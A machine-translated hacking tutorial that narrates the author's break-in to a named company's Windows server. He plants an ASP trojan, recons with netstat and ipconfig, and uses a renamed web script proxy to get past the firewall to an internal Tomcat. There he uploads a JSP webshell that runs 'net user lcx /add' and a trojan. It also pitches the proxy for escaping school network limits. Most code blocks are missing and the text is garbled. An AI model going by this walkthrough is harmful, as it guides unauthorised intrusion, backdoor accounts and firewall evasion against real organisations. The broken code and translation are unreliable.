Use script proxy to improve Permissions

By: Lcx

Many people may not understand the concept of web script proxy. The WEB script proxy is to place a dynamic script such as asp or php on the server, and then call this script to access other websites, the accessed website shows that the IP address you visit is the IP address of the server. The PhpSpy backdoor of 4ngel and the aspadmin webmaster assistant of Marcos both integrate this function. Both php and asp script proxies call the xmlhttp component, use the webshell server to transfer the remote website data and then present the content to you. Many programmers use this principle to write some thief programs. For example, they can call other website data by placing only a few script files on the website. If we use it for hacker attacks, what can we do with it? I just used it to do one thing, that is, to improve permissions and intrude into the Intranet.

1. Privilege Escalation

This should be a special case, but it was indeed met by me. I put a Haiyang top net asp Trojan on an intruded website. This website is an independent server of a company, so the directory permission is not as abnormal as the virtual host settings, almost all directories have the write permission, wscript. shell and other commands can also run. However, it is precisely because it is an independent server of the company that has not installed software that is easy to escalate permissions such as serv-u, and there is no additional third-party service software, and the system patches are quickly applied, privilege Escalation is still difficult. Replacing the service is a feasible method, but it takes time to wait. After careful viewing, some useful information is obtained. This server is a web server with IIS + ASP + ACCESS. It is installed with a firewall and only opens port 80 to the outside world. In addition, an apache + tomcat + jsp internal web system is installed with port 8080 open, and the physical directory of the internal web system is also found to be C: ApacheGroupTomcat 5.0 serverwebapps. This was determined by experience when I installed apache + tomcat + jsp. By running netstat-an on the top of Haiyang and viewing service options and directory information on asp trojans on the top of Haiyang, we can see the three points 1, 2, and 3. In addition, the ipconfig/all command clearly shows that the Intranet ip address 10.0.16.16 shown in Figure 1 is indeed the Intranet ip address of the server.

450) {this. resized = true; this. width = 450;} "border = 0 resized =" true ">

450) {this. resized = true; this. width = 450;} "border = 0 resized =" true ">

450) {this. resized = true; this. width = 450;} "border = 0 resized =" true ">

With the information available, the idea of Elevation of Privilege is also coming. If I can bypass the firewall and directly access its Intranet web systemHttp:/// 10.0.16.16: 8080Then, I can first use the asp Trojan horse at the top of Haiyang to upload a jsp webshell to its physical directory C: ApacheGroupTomcat 5.0 serverwebapps, and then call the jsp webshell. Its tomcat is installed as a Service. jsp generally inherits its system permissions. I started from the beginning, and directly used the htran.exe tool to switch its port 8080 to the Internet. Can I just succeed? I was very disappointed with the result. The port was transferred out, but still could not access its jsp system. I do not know why. After thinking about it, I suddenly thought of sending an asp script proxy to its website, and then calling this script proxy to access its Intranet jsp web system? Its intranet web and Internet web are both on the same server. It is not a problem to use a script proxy to access and bypass the firewall, because this script proxy will make the Intranet web system mistakenly believe that the same machine is accessing it. I have a WebProxy. asp script written by Marcos on hand, which acts as a proxy. So I changed my name to imgae. asp and passed it to a directory in the asp system on the Internet. Let's take a look at its effect: SubmitHttp://www.g* ***. Com/uploadimages/image. asp? Url =Http://www.haiyang.net/saf..., As shown in figure 4. We can see that my access ip is indeed changedWww. g* ***. Com: the ip address of the server.

450) {this. resized = true; this. width = 450;} "border = 0 resized =" true ">

Www.haiyang.net/safety/ip ....I wrote a small program to verify the visitor's ip address and port. The code is very simple, as follows:

★
Ip-> port
-> Actfor->

★

Okay, there is no bug in the script proxy. Write a jsp webshell and upload it to the physical directory of the Intranet jsp web system. The webshell of jsp is a small script tlist. jsp that runs commands and adds users. The Code is as follows:

★
<% @ Page import = "java. io. *, java. util. *, java.net. *" %>

★
Some may ask why not use some jsp Trojans. At first, I tried it because I used this WebProxy. asp can only be followed by a url file directly. Some post parameters in the url file do not work. The Trojans of the ready-made jsp files are a bit complex and have many functions, therefore, some commands must inevitably use some parameters. I uploaded this tlist. jsp file to the physical directory of the Intranet web, and then directly run http: // www.generalichina.com/uploadimages/image.asp? Url = http: // 10.0.16.16: 8080/manager/tlist. jsp is successfully added to the server with the id lcx! If you want to run a Trojan, you only need. in jsp, modify the "● String cmd =" cmd.exe/c net user lcx/add "; ●. As if I uploaded tlist.exe TO THE SYSTEM directory of the server and changed it to "● String cmd =" tlist.exe "; ●" to runHttp://www.generalichina.c...Url = http: // 10.0.16.16: 8080/manager/tlist. jsp running effect 5 is shown.

450) {this. resized = true; this. width = 450;} "border = 0 resized =" true ">

In the actual operation process, note that if you use tlist. if asp runs a command, you need to change the code to run other programs by putting tlist. asp changes the name once, or the result of the last execution is displayed. In addition, I do not know whether this server is special or another reason. I put the trojan in a non-system directory, such as c: muma.exe, then modify ● String cmd = "cmd.exe/c net user lcx/add"; ● To ● String cmd = "c: muma.exe"; ● The Trojan is not running, it runs successfully only under the system directory system32. I am not very clear about this reason.

Ii. intrusion into the Intranet and other advantages

Intrude into the Intranet. In the first example of elevation of permissions, it is clear that if the Intranet web of the machine is placed on another machine, the method is the same as that for elevation of permissions, however, it is not convenient to use the Intranet and Internet on the same machine. This is also an idea for scripts to intrude into the Intranet. The actual meaning is not great, but it is better than nothing. What are other advantages? If you are in the school network, you can only access the internal network and the school's web server, the school's web server is the same as the Internet, then you put a WebProxy on the web server. asp or other script proxy, is it true that you access http: // the school's web server/WebProxy on the Intranet. asp? Url = http://www.163.net/index.html can be on the internet? An asp script will solve the troubles of many students in the past?